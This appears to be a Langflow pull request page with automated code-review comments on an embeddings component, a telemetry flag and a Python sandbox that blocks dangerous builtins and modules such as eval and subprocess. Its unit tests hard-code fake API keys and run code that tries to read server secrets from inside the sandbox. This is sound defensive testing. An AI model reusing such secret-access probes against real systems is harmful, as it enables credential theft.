Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. 
\"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == 
\"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. 
\"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = 
False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n 
build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = field_value or self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" |
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, the ollama_base_url handler ignores the incoming
field_value and always uses self.ollama_base_url, which can cause stale model
lists; change the handler to use a local variable (e.g., ollama_url =
field_value or self.ollama_base_url) and then pass that variable to
is_valid_ollama_url and get_ollama_models so updates use the new value when
provided while still falling back to the instance attribute if field_value is
empty.
| "input_text": { | ||
| "_input_type": "BoolInput", | ||
| "advanced": true, | ||
| "display_name": "Include the original text in the output", | ||
| "dynamic": false, | ||
| "info": "", | ||
| "list": false, | ||
| "list_add_label": "Add More", | ||
| "name": "input_text", | ||
| "placeholder": "", | ||
| "required": false, | ||
| "show": false, | ||
| "title_case": false, | ||
| "tool_mode": false, | ||
| "trace_as_metadata": true, | ||
| "track_in_telemetry": true, | ||
| "type": "bool", | ||
| "value": true | ||
| }, |
Telemetry/privacy check for input_text flag.
The field tracks as telemetry. Ensure only the boolean is captured (no raw text) and that analytics pipelines don’t infer content from it. If uncertain, disable tracking.
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2038 to 2056, the input_text field is currently configured to be
traced and tracked which risks leaking raw text; change configuration so only
the boolean value is recorded — set trace_as_metadata to false and
track_in_telemetry to false (or remove those flags) and verify no other
properties (placeholders, default value, or surrounding logic) send or derive
the original text to analytics; if you cannot guarantee analytics will only
receive a boolean, disable telemetry entirely for this field.
| server_api_key = "sk-secret-key-12345" | ||
| server_db_password = "db_password_secret" | ||
| server_config = {"api_key": server_api_key, "database_url": "postgresql://user:password@localhost/db"} |
Fake API keys will trigger gitleaks and other secret scanners
The hard‑coded strings like:
- server_api_key = "sk-secret-key-12345" (Line 29)
- self.api_key = "sk-secret-12345" (Line 63)
match generic API‑key patterns and are already being flagged by gitleaks. Even though these are clearly test values, they will cause CI noise or failures.
Consider changing them to values that don’t resemble real keys (and avoid common prefixes like sk-), e.g.:
- server_api_key = "sk-secret-key-12345"
+ server_api_key = "FAKE_SERVER_API_KEY_FOR_TESTS"
@@
- self.api_key = "sk-secret-12345"
+ self.api_key = "FAKE_SERVER_CONFIG_API_KEY_FOR_TESTS"
or add explicit allowlist annotations consistent with your secret‑scanning configuration.
Also applies to: 63-66
🧰 Tools
🪛 Gitleaks (8.29.0)
[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 29-31 and
63-66, replace hard-coded strings that resemble real API keys (e.g. values with
sk- or sk-secret prefixes) with clearly non-secret test identifiers or reference
test fixtures/env vars, or add an explicit secret-scan allowlist annotation per
our CI configuration; ensure new values do not match common API-key patterns
(avoid prefixes like "sk-", long hex/base64 blobs, or "secret") and prefer
simple labels such as "test-api-key-1" or read the value from a test-only
config/env var, updating tests accordingly.
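A minimal sketch of the env-var approach mentioned above, assuming a hypothetical variable name (LFX_TEST_API_KEY is not defined anywhere in this PR) and a default label that avoids key-like patterns:

```python
import os

# Hypothetical env var name, used here only for illustration.
TEST_API_KEY_ENV = "LFX_TEST_API_KEY"

# Plain label with no "sk-" prefix, no "secret", and no long random blob.
DEFAULT_TEST_API_KEY = "test-api-key-1"


def get_test_api_key() -> str:
    """Return the test-only key from the environment, or a harmless label."""
    return os.environ.get(TEST_API_KEY_ENV, DEFAULT_TEST_API_KEY)
```

The tests would then assign `server_api_key = get_test_api_key()` instead of a literal. Whether this keeps the scanner quiet still depends on the repository's gitleaks rules.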
| code = """ | ||
| def test(): | ||
| # Try to access server's Python variables containing secrets | ||
| # If isolation is broken, these would be accessible | ||
| return server_api_key, server_db_password, server_config | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # CRITICAL: Should raise NameError - server secrets are not accessible | ||
| # This is what prevents credential theft | ||
| with pytest.raises(NameError): | ||
| test_func() |
🧩 Analysis chain
exec_globals["test"] never populated by execute_in_sandbox
All tests in this file follow the pattern:
- exec_globals = {}
- execute_in_sandbox(code_obj, exec_globals)
- test_func = exec_globals["test"]
- with pytest.raises(NameError): test_func()
However, the current execute_in_sandbox implementation constructs its own sandbox_globals dict, merges exec_globals into it, and then executes exec(code_obj, sandbox_globals, sandbox_locals) without writing anything back to exec_globals. That means exec_globals remains empty and exec_globals["test"] will raise KeyError before your pytest.raises(NameError) assertions ever run. The same issue affects every test using this pattern (lines 33‑50, 69‑86, 98‑129, 140‑160, 172‑188, 195‑214, 226‑249, 261‑275).
Two options:
- Adjust tests to assert on the exception raised by execute_in_sandbox itself (and call test() from within the code string), e.g.:
-    code = """
-def test():
-    # Try to access server's Python variables containing secrets
-    # If isolation is broken, these would be accessible
-    return server_api_key, server_db_password, server_config
-"""
+    code = """
+def test():
+    # Try to access server's Python variables containing secrets
+    # If isolation is broken, these would be accessible
+    return server_api_key, server_db_password, server_config
+
+# Call inside the sandbox so NameError is raised during execute_in_sandbox
+test()
+"""
@@
-    code_obj = compile(code, "<test>", "exec")
-    exec_globals = {}
-
-    execute_in_sandbox(code_obj, exec_globals)
-
-    # Call the function
-    test_func = exec_globals["test"]
-
-    # CRITICAL: Should raise NameError - server secrets are not accessible
-    # This is what prevents credential theft
-    with pytest.raises(NameError):
-        test_func()
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    # CRITICAL: Should raise NameError - server secrets are not accessible
+    # This is what prevents credential theft
+    with pytest.raises(NameError):
+        execute_in_sandbox(code_obj, exec_globals)
- Or, if the intended contract is that sandboxed definitions are exported back into exec_globals, update execute_in_sandbox to propagate selected names (e.g., functions) out of the internal sandbox_globals into exec_globals.
Right now, the tests and the sandbox API are not aligned, and the assertions won’t be exercising the intended NameError behavior.
🏁 Script executed:
#!/bin/bash
# Find execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type py
Length of output: 114
🏁 Script executed:
#!/bin/bash
# Find where execute_in_sandbox is imported/used in test file
rg -n "execute_in_sandbox" src/lfx/tests/unit/custom/test_sandbox_security.py -B2 -A2
Length of output: 1022
🏁 Script executed:
#!/bin/bash
# Get the full test file to understand structure
cat src/lfx/tests/unit/custom/test_sandbox_security.py
Length of output: 9640
🏁 Script executed:
#!/bin/bash
# Find all Python files that might contain execute_in_sandbox definition
fd -e py -x rg -l "def execute_in_sandbox" {} \;
Length of output: 35
🏁 Script executed:
#!/bin/bash
# Search more broadly for execute_in_sandbox in the codebase
rg -n "execute_in_sandbox" --type py -C3
Length of output: 12538
🏁 Script executed:
#!/bin/bash
# Get the execute_in_sandbox function implementation
sed -n '179,250p' src/lfx/src/lfx/custom/sandbox.py
Length of output: 2584
🏁 Script executed:
#!/bin/bash
# Get full sandbox.py file for complete context
cat src/lfx/src/lfx/custom/sandbox.py
Length of output: 8824
Tests fail with KeyError before asserting intended NameError behavior
The review comment is correct. In execute_in_sandbox, definitions created by exec(code_obj, sandbox_globals, sandbox_locals) are placed into sandbox_globals, not the passed-in exec_globals parameter. Since exec_globals is never updated after execution, the test pattern fails at exec_globals["test"] with KeyError before the NameError assertions can run.
This affects all tests in the file: lines 33–50, 69–86, 98–129, 140–160, 172–188, 195–214, 226–249, 261–275.
Choose one solution:
- Move the function call into the code string so NameError is raised during execute_in_sandbox:
code = """
def test():
    return server_api_key, server_db_password, server_config
test()
"""
code_obj = compile(code, "<test>", "exec")
exec_globals = {}
with pytest.raises(NameError):
    execute_in_sandbox(code_obj, exec_globals)
- Update execute_in_sandbox to propagate selected definitions (e.g., functions) back into exec_globals after execution.
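The second option could look roughly like the sketch below. This is not the PR's execute_in_sandbox: run_and_export and SAFE_BUILTINS are hypothetical names, and the sketch assumes a single namespace dict instead of separate globals and locals.

```python
import types

# Hypothetical allowlist of builtins exposed to sandboxed code (an assumption).
SAFE_BUILTINS = {"len": len, "range": range, "print": print}


def run_and_export(code_obj, exec_globals):
    """Stand-in for execute_in_sandbox that exports functions to the caller."""
    sandbox_globals = dict(exec_globals)
    sandbox_globals["__builtins__"] = SAFE_BUILTINS
    sandbox_globals["__name__"] = "__sandbox__"

    # Single namespace: top-level definitions land in sandbox_globals.
    exec(code_obj, sandbox_globals)

    # Export only plain functions. Each keeps sandbox_globals as its
    # __globals__, so later calls still resolve names in the isolated dict.
    for name, value in sandbox_globals.items():
        if isinstance(value, types.FunctionType):
            exec_globals[name] = value


code_obj = compile("def test():\n    return server_api_key\n", "<test>", "exec")
exec_globals = {}
run_and_export(code_obj, exec_globals)
```

With this contract the existing test pattern works as written: exec_globals["test"] exists, and calling it raises NameError because server_api_key is not present in the isolated namespace.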
Should we make some of this lazy?
Converting to draft for now. We need a way to identify core components before this can be merged; otherwise core components that use "dangerous" builtins will fail 1) Updates and 2) Check and Save (during validation). Once we have a method to identify core components, we can also add this isolation layer to execution.
Allows users to configure security levels that block builtins and modules with system-level access, such as eval, subprocess, etc. Works during validation and during execution.
Does not block builtins or modules in core (trusted) components.
Note that this isn't a true isolated sandbox - Python does not provide that capability. Python processes generally rely on containers and virtualization to enforce security.
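As a rough illustration of the blocking mechanism described above (not the code in this PR), the sketch below swaps in a restricted `__import__` and a filtered builtins dict. The blocked sets, the helper names, and this SecurityViolation class are assumptions made for the example.

```python
import builtins


class SecurityViolation(Exception):
    """Stand-in exception type for a blocked operation."""


def make_restricted_import(blocked_modules):
    """Wrap the real __import__ and reject modules whose root name is blocked."""
    real_import = builtins.__import__

    def restricted_import(name, globals=None, locals=None, fromlist=(), level=0):
        root = name.split(".")[0]
        if root in blocked_modules:
            raise SecurityViolation(f"import of '{name}' is blocked")
        return real_import(name, globals, locals, fromlist, level)

    return restricted_import


def make_restricted_builtins(blocked_modules, blocked_builtins):
    """Copy the builtins, drop blocked names, and install the import wrapper."""
    safe = {k: v for k, v in vars(builtins).items() if k not in blocked_builtins}
    safe["__import__"] = make_restricted_import(blocked_modules)
    return safe


# Example configuration; the real levels and lists are defined by the PR.
namespace = {"__builtins__": make_restricted_builtins({"subprocess"}, {"eval", "exec"})}
exec(compile("import math\nroot = math.sqrt(4)", "<demo>", "exec"), namespace)
```

Code run in `namespace` can import math, while `import subprocess` raises SecurityViolation and `eval` is simply undefined. As the note above says, this is a guardrail and not a real sandbox, since Python offers other routes to the same objects.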